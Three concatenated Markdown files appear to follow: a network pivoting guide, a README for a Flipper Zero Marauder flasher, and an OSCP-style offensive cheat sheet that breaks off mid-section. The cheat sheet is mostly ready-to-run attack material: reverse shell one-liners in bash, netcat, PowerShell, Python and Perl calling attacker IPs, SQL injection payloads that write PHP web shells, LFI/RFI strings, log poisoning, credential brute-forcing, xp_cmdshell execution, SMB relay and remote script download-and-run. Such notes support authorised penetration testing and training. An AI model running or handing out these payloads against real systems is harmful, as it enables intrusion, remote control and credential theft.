[Urchin]: https://github.com/scraperwiki/urchin
[Fish]: http://fishshell.com
|
# Pivoting Guide
## Table of Contents
1. [Important Notes](#Important-Notes)
2. [SSH Dynamic Port Forwarding](#SSH-Dynamic-Port-Forwarding)
3. [SSH Remote Port Forwarding](#SSH-Remote-Port-Forwarding)
4. [SSH Local Port Forwarding](#SSH-Local-Port-Forwarding)
5. [Double Pivoting](#Double-Pivoting)
6. [sshuttle](#sshuttle)
7. [Chisel](#Chisel)
8. [Using Burpsuite as Proxy](#Using-Burpsuite-as-Proxy)
9. [Usefull Resources](#Usefull-Resources)
## Important Notes
- **Do not use ICMP echo requests (ping) to test SOCKS proxies**.
SOCKS is an Internet protocol that exchanges network packets between a client and server through a proxy server. Practically, a SOCKS server proxies TCP connections to an arbitrary IP address, and provides a means for UDP packets to be forwarded.
You should test it using a TCP based protocol (e.g. try to SSH or send an HTTP GET request to a host accross the pivot tunnel).
- **NMAP must be used with TCP connect scan (-sT) and no ping (-Pn)**
This also applies to version (-sV) and script scans (-sC). They should be used in combination with -sT and -Pn.
**Examples:**
```
proxychains nmap -sT -Pn -p- x.x.x.x
proxychains nmap -sT -Pn -sV -sC -p 21,80,443,445 x.x.x.x
```
**Tip**: You can upload [naabu](https://github.com/projectdiscovery/naabu) to the victim machine and scan away like a boss.
- **Using scripts and binaries with proxychains**
One tip for using proxychains is to ensure that if you are running an interpreted program (like a Python script) its a good idea to explicitly reference the Python binary before that script, even if the script starts with a hash bang, e.g.:
```
proxychains4 [-q -f proxychains.conf] python python_script.py
```
Without this specific reference to the script interpreter, sometimes the traffic generated from the script will fail to be routed through the proxy as you intended, and the network connection will fail. [Tip Source](https://thegreycorner.com/2021/12/15/hackthebox_dante-review.html)
- **Uncomment line "quite mode" in /etc/proxychains.conf to avoid stdout that can be frustrating at times.**
This is merely a suggestion.
## SSH Dynamic Port Forwarding
Allows you to create a socket on the local (ssh client) machine, which acts as a SOCKS proxy server. When a client connects to this port, the connection is forwarded to the remote (ssh server) machine, which is then forwarded to a dynamic port on the destination machine.
**How to set it up**:
1. Edit /etc/proxychains.conf and implement the following:
- Remove **Dynamic chain** from comment.
- Comment **Strict chain** and **Random chain**.
- Append line **socks4 127.0.0.1 9050** at the end of the document (proxy list), save and close file. *You can, of course, use a different port.
2. Setup the SSH Dynamic Port Forwarding:
```
ssh -D 127.0.0.1:9050 user@victim-IP
```
**Usage examples**:
With x.x.x.x being the ip address of a host that belongs to the tunneled network:
```
proxychains nmap -sT -Pn -p- x.x.x.x
proxychains smbmap -H x.x.x.x
proxychains ssh user@x.x.x.x
```
In order to use firefox throught the tunnel:
```
proxychains firefox
```
## SSH Remote Port Forwarding
If you are searching how to get a **reverse shell through a pivot tunnel**, this is what you need. It allows you to forward a port on the remote (victim) machine to a port on the local (attacker) machine.
**How to set it up**:
1. SSH into the victim machine.
2. Edit /etc/ssh/sshd_config and implement the following:
- Remove **GatewayPorts no** from comment and change it to **Yes**. Save and close file.
**This is very important and many guides around the web do not mention it. If you don't do this you will only be able to set the tunnel on 127.0.0.1 rather than 0.0.0.0, which will end up not forwarding traffic when it originates from any host except localhost.*
- Restart the SSH service for changes to be effective. `sudo service ssh restart`
- Exit and return to your machine.
3. Setup the SSH Remote Port Forwarding:
Essentially, after setting it up as mentioned, the command is as simple as that:
```
ssh -R 2222:*:2222 user@victim-IP
```
In order to test if it works, you could do the following:
Set a listener (e.g. netcat) on your attacker machine (on the port you configured the remote forward, in this example 2222) and make a request from the victim machine to itself (localhost). In this example, that would be `nc 127.0.0.1 2222`. If your attacker machine receives the connection then it means that a) it works and b) every connection from pivoting hosts to the victimip:2222 will be forwarded to attacker machine.
You can set multiple ports like this:
```
ssh -R 2222:*:2222 -R 3333:*:3333 user@victim-IP
```
**Caution**: Requests from foreign hosts (pivoting network) must be addressed to the victim ip in order to be forwarded back to the attacker machine.
**You can also implement Remote Port Forwarding by SSH connecting from victim to attacker machine.*
## SSH Local Port Forwarding
Local port forwarding allows you to forward a port on the local (attacker) machine to a port on the remote (victim) machine. Particularly usefull in order to scan local ports on victim.
**Usage**:
```
ssh user@victim-IP -L 8888:127.0.0.1:8086
```
You can now use e.g. nmap to scan port 8086 on the victim machine like this:
```
nmap -Pn -n -p8888 -sV 127.0.0.1
```
## Double Pivoting
An example of how to implement double pivoting with SSH Dynamic Port Forwarding and Proxychains.
**Concept**:
Suppose we have the following 4 machines.
| IP | Role |
|-------------|:---------:|
| 10.10.10.10 | Attacker |
| 10.10.10.11 | Jumphost1 |
| 172.16.1.12 | Jumphost2 |
| 172.16.2.13 | Jumphost3 |
Attacker can reach Jumphost1.
Jumphost1 can reach Jumphost2.
Jumphost2 can reach Jumphost3.
1. In order to reach Jumphost2, implement **SSH Dynamic Port Forwarding** instructions mentioned before, against Jumphost1.
2. In order to reach Jumphost3, edit /etc/proxychains.conf and add another proxy entry at the end of the document. The end of your proxychains.conf will now look something like this:
```
...
socks4 127.0.0.1 9050
socks4 127.0.0.1 9999
```
3. SSH into Jumphost1 and set another Dynamic Port Forwarding against Jumphost2 (the local port you choose must be the same as the one set for your second proxy entry in proxychains.conf):
```
ssh -D 127.0.0.1:9999 user@Jumphost2
```
You should now be able to reach Jumphost3.
## sshuttle
sshuttle allows you to create a VPN connection from your machine to any remote server via ssh, as long as that server has python 2.3 or higher. To work, you must have root access on the local machine, but you can have a normal account on the server. It's valid to run sshuttle more than once simultaneously on a single client machine, connecting to a different server every time, so you can be on more than one VPN at once. Check the [sshuttle github repository](https://github.com/sshuttle/sshuttle).
**Usage**:
Assuming we want to pivot into 172.16.2.0/16:
```
sshuttle -vvr root@victim 172.16.2.0/16
```
If you want to use ssh key:
```
sshuttle -vvr root@victim --ssh-cmd 'ssh -i ~/.ssh/id_rsa' 172.16.2.0/16
```
## Chisel
Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). It's insanely awesome and useful.
**Installation**:
You can easily install chisel on kali:
```
apt install chisel
```
In order to use it, you also need to upload the chisel binary on the victim. You can download precompiled versions [here](https://github.com/jpillora/chisel/releases).
**Local port forwarding example**
On your attacker machine:
```
chisel server -p 8000 --reverse
```
On the victim machine:
```
./chisel_1.7.7_linux_amd64 client attacker-ip:8000 R:1234:127.0.0.1:8443
```
This is going to forward traffic from attacker machine port 1234 to victim machine port 8443.
## Using Burpsuite as Proxy
Burpsuite supports the capability of setting proxies, an incredibly useful and powerfull feature.
**How to set it up**:
Fire up Burpsuite and implement the following:
- Goto Proxy/Options and hit **add** on the Proxy Listeners section.
- Set a binding port and interface.
- on the second tab, set the host and port you want to redirect traffic to.
In combination with setting up an SSH Dynamic Port Forwarding or sshuttle, you can now use Burpsuite to pivot traffic to desired hosts by sending traffic to your localhost bind port. A useful example with gobuster dir brute through the tunnel (Assumming that you set port 2222 as the redirect port):
```
gobuster dir -u http://127.0.0.1:2222 -t 40 -w /some/dirlist.txt
```
## Usefull Resources
- https://artkond.com/2017/03/23/pivoting-guide/
- https://catharsis.net.au/blog/network-pivoting-and-tunneling-guide/
- https://medium.com/cyberxerx/how-to-setup-proxychains-in-kali-linux-by-terminal-618e2039b663
|
# Quick and easy flasher/updater for [Marauder](https://github.com/justcallmekoko/ESP32Marauder) on the Wifi Devboard!
Looking for a Linux/OS X version? [Check out SkeletonMan's Python edition!](https://github.com/SkeletonMan03/FZEasyMarauderFlash) (WIP for Windows too including full automated downloads.)
Looking for a quick video walkthrough on how to use this flasher? [Thanks to Lab401.com, you're in luck](https://www.youtube.com/watch?v=um_acrDaBK4)!<br>
Or if you'd rather have a quick rundown of using the Flipper Application, check out [this summary from haxez.org](https://haxez.org/2022/11/marauding-wi-fi-networks-with-the-flipper-zero/).
![Flasher_SS](https://user-images.githubusercontent.com/57457139/195889709-cd8086f2-dbd3-4ca2-9965-75be64fab4da.png)
## Now it's as easy as 1, 2, 3 to install or update Marauder on Windows.
1. Download and extract [the ZIP file](https://github.com/UberGuidoZ/Flipper/raw/main/Wifi_DevBoard/FZ_Marauder_Flasher/FZ_Marauder_v2.0.zip) above to the same directory.<br>
2. Hold `BOOT` on the devboard and plug it into your PC directly via USB.<br>
3. Double-click `flash.bat` from the extracted files then choose `Flash` or `Update`.
* If you choose `Flash Marauder` the script will locate your board and flash Marauder automatically!<br>
* If you choose `Update Marauder` you'll be taken to the Marauder download location to grab a new version.<br>
(Simply download the Flipper BIN file, stick it in the Marauder subfolder by the batch file, and delete the old BIN.)<br>
* If you choose `Save Flipper Blackmagic WiFi settings` your current Blackmagic configuration will be saved.<br>
* If you choose `Flash Flipper Blackmagic` the script will flash the original Blackmagic firmware it shipped with.
Current Marauder version included in the ZIP: v0.10.0.20221222 (current release as of Dec 22, 2022)
**Once the install has completed, [head over here](https://github.com/UberGuidoZ/Flipper/tree/main/Wifi_DevBoard#marauder-install-information) to learn more about what Marauder can do!**
The [batch file](https://github.com/UberGuidoZ/Flipper/blob/main/Wifi_DevBoard/FZ_Marauder_Flasher/Flash-v1.9.bat) is also included above for review and to track coming changes.
Acknowledgements:<br>
* [justcallmekoko](https://github.com/justcallmekoko/ESP32Marauder) for the AWESOME work in developing Marauder and porting it to the Flipper.
* [0xchocolate](https://github.com/0xchocolate) for the Marauder companion plugin (now in [Unleashed](https://github.com/Eng1n33r/flipperzero-firmware) and [RogueMaster](https://github.com/RogueMaster/flipperzero-firmware-wPlugins).)
* [Frog](https://github.com/FroggMaster) For initial scripting under the [Wifi Pentest Tool](https://github.com/FroggMaster/ESP32-Wi-Fi-Penetration-Tool) and inspiring the idea.<br>
* [ImprovingRigmarole](https://github.com/Improving-Rigmarole) Initial (and continued) scripting of this flasher and lots of testing.<br>
* [UberGuidoZ](https://github.com/UberGuidoZ) Tweaking/Automating Frog's original, continued scripting, development, and testing.
|
# Offensive Security Documentation
OSCP Links:
- https://github.com/0x4D31/awesome-oscp
- https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html#preperation
- https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97
## Discovery
- Fast host discovery for big ranges (pingscan):
`nmap -sn -T5 --min-parallelism 100 --max-parallelism 256 -oA nmap_10.0.0.0-8_hostdiscovery 10.0.0.0/8`
- Thorough host discovery TCP:
`TOPTCP="$(grep -E "^[^#]*/tcp" /usr/share/nmap/nmap-services | sort -k 3nr | cut -f2 | cut -f1 -d/ | head -1000 | tr '\n' ',')"`
`nmap -n -sn --reason -PR -PE -PP -PM -PO -PY -PA -PS"$TOPTCP" -PU -iL targets.txt -oA nmap_host_discovery_arp_icmp_ip_sctp_tcp_udp`
Quick Win Ports:
`# nmap -n -Pn -sS -p 21,23,69,80,111,139,443,445,1433,2049,3263,3264,3306,5432,5900,6000,8080,8443,22,25,587,53,3389 -oA quick_wins_tcp_vlans -iL ranges.txt --min-hostgroup 256 --max-retries 1 --defeat-rst-ratelimit --min-rate 10000
`
Add discovered hosts to textfile:
`awk '/Up$/{ print $2 }' nmap_host_discovery_arp_icmp_ip_sctp_tcp_udp.gnmap | sort -V > targets_online.txt`
- Host / Service discovery UDP:
Get top 100 UDP ports:
`grep -E "^[^#]*/udp" /usr/share/nmap/nmap-services | sort -k 3nr | cut -f2 | cut -f1 -d/ | head -100 > udp_ports`
Get all UDP ports that have a payload that is sent by nmap. The chances are higher, that you will get a response when nmap sends a valid payload and the port is then treated as definitively open (instead of filtered|open when no response was received):
`grep ^udp /usr/share/nmap/nmap-payloads | cut -d " " -f2 | tr , '\n' | sort -un >> udp_ports`
Get all UDP ports that have a nmap-script. The chances are again higher that you will receive a response when the script is executed:
`grep -l -E "categories.*default" /usr/share/nmap/scripts/* | xargs grep -h -E "portrule.*udp" | grep -o -E "[0-9]+" >> udp_ports`
Assign them to a variable:
`UDPPORTS="$(sort -un udp_ports | tr '\n' ,)"`
Start scanning:
`nmap -n -Pn --reason -sU -sC -p "$UDPPORTS" -iL targets.txt --excludefile targets_online.txt -oA nmap_host_discovery_udp_service_scan`
Now add hosts with open UDP Ports to targets_online.txt:
`awk '/\/open\//{ print $2 }' nmap_host_discovery_udp_service_scan.gnmap >> targets_online.txt`
- Full TCP service scan on found hosts:
`nmap -n -Pn --reason -sS -sC -sV -p- -O -iL targets_online.txt -oA nmap_service_scan_tcp`
- If you want only open ports without all the details:
`nmap -n -Pn --reason -sS -p- -iL targets_online.txt -oA nmap_service_scan_tcp`
- start with less ports until full scan is done:
`nmap -n -Pn --top-ports 100 --reason -sS --min-hostgroup 128 --max-retries 1 --min-rate 500 --defeat-rst-ratelimit -iL targets_online.txt -oA nmap_SYN_scan_TCP_TOP_100`
- NMAP result grepping:
Get all open ports from multiple nmap scans:
`# cat nmap_service_scan_udp.nmap nmap_service_scan_tcp.nmap | awk -F/ '/(tcp|udp).*open /{ print $1}' | sort -un | tr '\n' ','`
- NMAP Reports:
https://github.com/maaaaz/nmaptocsv
`python nmaptocsv.py -x SMBClientScan.xml -f ip-port-protocol-service-version-os >> output.csv`
- NMAP based OS Discovery:
`nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery <ipaddress>`
- Discovery & Data Gathering tools:
`https://github.com/codingo/Reconnoitre`
- Replace nmap with netcat:
`nc -z -v {host-name-here} {port-range-here}`
`nc -nvv -w1 -z 10.X.X.Y 1-100 2>&1 | grep open`
``for port in `seq 65535`; do { disown -r ; nc -nvv -w1 -z 10.X.X.Y $port 2>&1 | grep ' open' & } 2>/dev/null ; disown -r ; done``
## DNS Enum in AD Domains
Check out adidnsdump from dirkjanm: https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/
First list zones:
`proxychains adidnsdump -u domain\\username --print-zones <DC/DNS IP> --dns-tcp`
If we specify the zone to the tool (or leave it empty for the default zone), we will get a list of all the records. Records which can be listed but not read (so called “hidden” records) are shown but only with a question mark, as it is unknown which type of record is present and where it points to. The records are all saved to a file called records.csv.
`proxychains adidnsdump -u domain\\username <DC/DNS IP> --dns-tcp`
## HTTP/HTTPS
- `curl -i <ip>`
- `nikto -host $targetip -port $targetport`
- `./dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $targetip -e php`
- `gobuster dir -e -k -w /usr/share/wordlists/dirb/common.txt -r -u https://www.example.com`
`gobuster with cookies: gobuster dir -e -k -w /usr/share/wordlists/dirb/common.txt -c 'connect.sid=s%3AEKo...jYluY; JSESSIONID=3asdasd889DF94A;' -r -u https://somedomain.com`
- gobuster comprehensive busting:
`gobuster -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'`
- gobuster search with file extension:
`gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php`
- Wordpress scan:
`wpscan -u 10.10.10.10/wp/`
- Login pages:
Username enumeration through
- Checking login failed message
- Registering account (try same email twice, same username twice)
- PHP Logfile contamination:
(add the PHP code to the logfile and the with LFI get the logfile somewhere where "include PHP function" is being used)
`kali@kali:~$ nc -nv 10.11.0.22 80`
`(UNKNOWN) [10.11.0.22] 80 (http) open`
`<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>`
Use the PHP code in the logfile:
`http://10.11.0.2/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig`
- Screenshots using GoWitness (via burp proxy):
`./gowitness-2.4.2-linux-amd64 file -f urls.txt --delay 10 -p http://127.0.0.1:8080`
GoWitness report creation:
`./gowitness-2.4.2-linux-amd64 report export -f gowitness-report.zip`
- Aquatone Installation:
`wget https://github.com/michenriksen/aquatone/releases/download/v1.7.0/aquatone_linux_amd64_1.7.0.zip`
`unzip aquatone_linux_amd64_*.zip -d /opt/aquatone/`
If google chrome is not yet installed:
`echo "deb [arch=amd64] https://dl.google.com/linux/chrome/deb/ stable main" > /etc/apt/sources.list.d/google-chrome.list`
`wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add -`
`apt-get update`
`apt-get install google-chrome-stable`
Aquatone Usage:
Collect data based on nmap report: `cat nmap.xml | /opt/aquatone/aquatone -nmap -chrome-path /usr/bin/google-chrome -out screenshots -ports xlarge`
Run Aquatone on list of IPs with specific ports: `cat ips.txt | /opt/aquatone/aquatone -chrome-path /usr/bin/google-chrome -out screenshots -ports 25,80,161,264,443,2001,3478,4999,5222,6080,8443,18264,27299,38751`
- https://guif.re/webtesting
- https://sushant747.gitbooks.io/total-oscp-guide/common_web-services.html
## SMB
- `nmap -p 139,445 --script=smb-vuln* $targetip`
- `enum4linux -a $targetip`
- `smbclient \\\\$ip\\$share`
- `smbmap -H <IPAddress>`
- `nbtscan`
- `crackmapexec smb 10.11.1.1/24`
- Null connect:
`rpcclient -U "" 10.10.10.10`
- Try known creds on targets: `crackmapexec smb 10.11.1.1/24 -u Administrator -p 99bbVDdorGzfZJun`
- Bruteforcing: `crackmapexec smb 10.11.1.1/24 -u /ville/Desktop/OSCP/PWK/users.txt -p /ville/Desktop/OSCP/PWK/pws.txt`
- Check accessible shares in network with specific domain account:
`# smbmap -d <domain> -u <username> -p <password> --host-file files/smbhosts.txt`
- Search for sensitive data on shares with smbmap:
- `# smbmap -d DOMAIN -u USER -p PASSWORD --host-file hosts.txt -R -A ".+\.(bat|cmd|ini|kdb|kdbx|key|ps1|reg|txt|vbs)|.*(admin|login|pass|secret|sensitive).*|unattend.*\.xml|web.config" --depth 3`
- Query AD users in domain from Kali with known credentials:
`# /opt/impacket/examples/GetADUsers.py -all domain.local/user1:Str0ngP@ss2021 -dc-ip 192.168.10.1`
- Search interesting files using MANSPIDER:
`manspider host.domain.local --sharenames generalshare -e bat ps1 cfg conf kdbx rtsz -d domain.local -u user1 -p somepass`
Get files from SMB share:
- /usr/share/doc/python-impacket/examples# python smbclient.py 10.11.1.136
- `shares` --> list shares
- `use <share>` --> use share xyz
- `get <file>` --> download file
Or with smbget:
- `smbget -R smb://1.1.1.1/folder`
Transfer files from the Kali VM with smbserver.py:
- `python /usr/lib/python2.7/dist-packages/impacket/smbserver.py share /root/Desktop/OSCP/SMB/SMBServer/`
- on the Windows target, get the connection to the share with e.g.: `net use \\<kali-ip>\share`
- copy the file from the remote target to the kali: `copy file.txt \\<kali-ip>\share\
## WinRM
- WinRM from Linux: https://github.com/Hackplayers/evil-winrm
`# ruby evil-winrm.rb -i 10.10.10.169 -u Hans -p 'Wurst123!' -s /opt/PowerSploit/Privesc/`
`*Evil-WinRM* PS C:\Users\Hans\Documents> PowerUp.ps1`
Now, locate all imported functions with "menu"
- Evil-WinRM with custom scripts:
`# locate PowerSploit/Privesc/Privesc.psd1`
`/opt/PowerSploit/Privesc/Privesc.psd1`
`# ruby evil-winrm.rb -i 10.10.10.169 -u Hans -p 'Wurst123!' -s /opt/PowerSploit/Privesc/`
## WMI Commands
- You can run WMI commands remotely without using WinRM / PSExec:
[WMI doc](wmi.md)
## NFS
- `nmap -p 111 --script=nfs* -iL nfstargets.txt`
example output:
`PORT STATE SERVICE`
`111/tcp open rpcbind`
`| nfs-ls: Volume /home`
`| access: Read Lookup NoModify NoExtend NoDelete NoExecute`
Mount the dir:
`mkdir nfsmount; sudo mount -o nolock 10.11.1.72:/home ~/nfsmount/`
## FTP
- First check for anonymous access
`ftp $targetip`
`Username: anonymous`
`Password: anything`
Path traversal:
- FTP: `ftp://10.11.1.125/../../../../windows/system32/wbem/logs/mofcomp.log`
## DNS
- DNS Zone transfer lookup
`host -l <domain> <nameserver IP address>`
(e.g.: host -l megacorpone.com 38.100.193.80)
this might provide additional information about the network, listing hostnames and ip addresses
## SSH
- "unable to negotiate with ... no matching key ex found" --> add to config:
`# cat /root/.ssh/config`
`host 10.11.1.252`
`KexAlgorithms +diffie-hellman-group1-sha1`
`PubkeyAcceptedKeyTypes=+ssh-dss`
- "xxxx must be run from a terminal" --> spawn terminal:
1. `echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py`
2. `python /tmp/asdf.py`
- SSH Tunnel (Source --> public ip 1.1.1.1 --> machine with private ip 2.2.2.2) to RDP to internal VM (2.2.2.2)
`ssh -l <username-on-1.1.1.1> (-i key.txt) -L 1337:2.2.2.2:3389 1.1.1.1`
Afterwards you can RDP to the internal VM with: localhost:1337
Another example:
`ssh -l username@sshjumphost -i key -L 1337:20.130.239.71:3389 sshjumphost.com`
Now connect RDP with 127.0.0.1:1337
- SSH Tunnel with SSHuttle:
`sshuttle -vvr user@10.10.10.10 10.1.1.0/24`
With SSH Key:
`sshuttle -vr root@10.10.10.13 172.16.1.0/24 --ssh-cmd 'ssh -i sshloginkey.txt'`
Now all traffic to 172.16.1.0/24 will be sent to the tunnel
- SSH JumpProxys:
`on kali VM:`
`# cat ~/.ssh/config`
`Host remotehost`
` User remoteuser`
` IdentityFile ~/.ssh/id_rsa`
` ProxyJump user@jumphost.com`
Then use with:
`# ssh remotehost`
## SMTP
- check if user exists:
`nc -nv <ip address> 25`
`VRFY <username>`
automate with bash:
`for user in $(cat users.txt); do echo VRFY $user | nc -nv -w 1 192.168.100.100 25 2>/dev/null | grep ^"250";done`
## SNMP
- `snmp-check 10.10.10.10`
## Exploits / Searchsploit
- Update Searchsploit
`searchsploit -u`
- Search exploit
`searchsploit $multiple $search $terms`
## SQL Injection
SQLMap
- Use saved request from burp: (-p is parameter, can be removed if you add * to the param in the request file, remember to use force-ssl param!)
`sqlmap -r request.txt -p objectid --risk 3 --level 5`
- Define the target DBMS and run the request through local proxy (e.g. burp). Show the schema of the DB:
`sqlmap --proxy http://localhost:8080 -r request --dbms="Microsoft SQL Server 2017" --schema --force-ssl`
- SQLMap Crawl:
`sqlmap -u http://10.10.10.10 --crawl=1`
- SQLMap Dump DB:
`sqlmap -u http://10.10.10.10 --dbms=mysql --dump`
- SQLMap Shell:
`sqlmap -u http://10.10.10.10 --dbms=mysql --os-shell`
- SQL Shell through UNION based SQL Injection in "TextBoxUsername" field:
`sqlmap -r request.txt -p TextBoxUsername --sql-shell --technique=U --force-ssl`
- Search for columns with the name password
`python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --time-sec=1 --search -C 'password'`
Bypasses
`' or 1=1;#` (MySQL/MariaDB)
`' or 1=1 LIMIT 1;#` (MySQL/MariaDB) --> If e.g. login expects only one entry in returned query
`' or 1=1 LIMIT 1 --`
`' or 1=1 LIMIT 1 -- -`
`' or 1=1 LIMIT 1#`
`' or 1#`
`' or 1=1 --`
`' or 1=1 -- -`
`id=1'+OR+1=1--#`
`id=1\n'+OR+1=1--#`
Queries
- Upload php command injection file:
`union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'`
- Load file:
`union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6`
MySQL
- Enumerate tables:
`http://10.11.14.101/comment.php?id=769 union all select 1,2,3,4,table_name,6 FROM information_schema.tables`
- Get columns of specific table:
`http://10.11.14.101/comment.php?id=769 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'`
- Get content of table:
`http://10.11.14.101/comment.php?id=769 union select 1,2,3,4,concat(name,0x3a,password),6 FROM users`
- Create new php file with cmd.exe:
`http://10.11.14.101/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'`
- Use the new page with params:
`http://10.11.14.101/backdoor.php?cmd=whoami`
## MSSQL
- Nmap scripts with db credentials:
`# nmap -n -Pn -p1433 --script "ms-sql-* and not ms-sql-brute" --script-args mssql.username=sa,mssql.password=<pw> 10.11.1.31`
- Impacket mssqlclient.py:
`mssqlclient.py HOSTNAME/USERNAME:'PASSWORD'@10.10.10.22 -windows-auth`
Check if the user is sysadmin:
`SQL> SELECT IS_SRVROLEMEMBER ('sysadmin')`
`-----------`
`1`
Run OS commands through xp_cmdshell:
`SQL> EXEC sp_configure 'xp_cmdshell', 1`
`[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.`
`SQL> reconfigure;`
`SQL> xp_cmdshell "whoami"`
`[...]`
`hostname\sql_svc`
Using PowerUpSQL:
`IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1')`
`$Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 -username "domain\user" -password "passw0rd123" | Where-Object {$_.Status -like "Accessible"}`
`Invoke-SQLAudit -Verbose -Instance "servername.domain.local,1433"`
Manually get all SQL SPNs from list of reachable SQL servers:
`# add all sql targets to a file called sql_hosts.txt`
`# get all SPNs into a file:`
`foreach($entry in (Get-Content .\sql_hosts.txt)){ $dnsname = (Resolve-DnsName $entry).Namehost; setspn -q *MSSQL*/*$dnsname* | select-string "MSSQL" | Out-File sql_instances.txt -Append }`
import PowerUpSQL and run the SQLAudit on all instances:
`IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1')`
`foreach($item in ((Get-Content .\sql_instances.txt).trim() | ? {$_ -ne ""})){ Invoke-SQLAudit -Verbose -Instance "$item"}`
Run Query using PowerUpSQL:
`Get-SQLQuery -Instance "sql1.domain.local,1433" -Query "select @@servername"`
Using Impacket mssqlclient.py:
`python3 /usr/local/bin/mssqlclient.py -windows-auth DOMAIN/user@10.10.100.100`
`SQL> select @@servername;`
SMB Relay through xp_dirtree:
Run responder on kali with `/opt/Responder/Responder.py -I eth0 -w -r -f -d`
Initiate connection on xp_dirtree vulnerable sql server: `Get-SQLQuery -Verbose -Instance "servername.domain.local,1433" -Query "EXEC master.sys.xp_dirtree '\\<kali-ip>\test123'"`
or: `Get-SQLQuery -Instance servername.domain.local -Query "xp_fileexist '\\<kaliip>\file'" -Verbose | out-null`
SQL Command Execution:
`Invoke-SQLOSCmd -Instance "sql1.domain.local,1433" -Command "whoami" -RawResults`
Using mssqlclientpy:
`EXEC xp_cmdshell 'whoami';`
### Using SPN List
**Resolve all hosts for their IP** (If needed to check in scope items):
```powershell
foreach($entry in (get-content "C:\Users\bob\Desktop\sqlhostnames.txt")){
$dnsentry = Resolve-DnsName -Name $entry -TcpOnly -Server 10.0.0.1 -ErrorAction SilentlyContinue
if($dnsentry.count -gt 0){ $dnsentry | % {"$($_.Name),$($_.IPAddress)"} }else{ "$entry,N/A" }
start-sleep -Seconds 5
}
```
Use the list with PowerUpSQL:
`get-content .\sqlinstances.txt | Get-SQLConnectionTest -Verbose -Username "domain\user" -password "asdfasdf"`
## File inclusion
- LFI: http://target.com/?page=home --> http://target.com/?page=./../../../../../../../../../etc/passwd%00
- RFI: http://target.com/?page=home --> http://target.com/?page=http://hackerip/evil.txt%00
- With LFI, data wrappers can be used:
`http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>`
## Reverse Shells
Linux:
- Pipe /bin/sh back to 10.0.0.1 port 1234:
`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f `
- More: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- `nc -e /bin/sh 10.10.10.10 4443`
- `bash -i >& /dev/tcp/10.10.10.10/443 0>&1`
Windows:
- nc.exe on Windows:
`nc.exe -e cmd.exe attackerip 1234`
- PowerShell:
`powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.10',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"`
- Python:
`python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`
- Perl:
`perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"$attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'`
PHP:
- First modify the post request parameters to create a php file which executes the shell:
`q=test&lang=en' union select all 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/newbackdoor.php';#`
afterwards run the command to spawn a reverse shell:
`http://10.11.14.101/newbackdoor.php?cmd=c:\users\offsec\desktop\tools\netcat\nc.exe -nv 10.11.0.90 443 -e cmd.exe`
- Alternative:
`<?php echo system($_GET["cmd"]);?>`
## Info Gathering
### Windows
- PS History: `cat (Get-PSReadlineOption).HistorySavePath`
- `type C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt`
- `Get-ScheduledTask| % { $_.Actions}`
- `schtasks /query /v /fo LIST`
- IIS App Pool Creds: `(ls IIS:\AppPools | Get-ItemProperty -Include ProcessModel).ProcessModel | select UserName,Password`
- psexec.py Login with account:
`psexec.py administrator@10.10.10.10`
### Active Directory
- Query AD without PS AD Modules
List Global Catalogs of a forest:
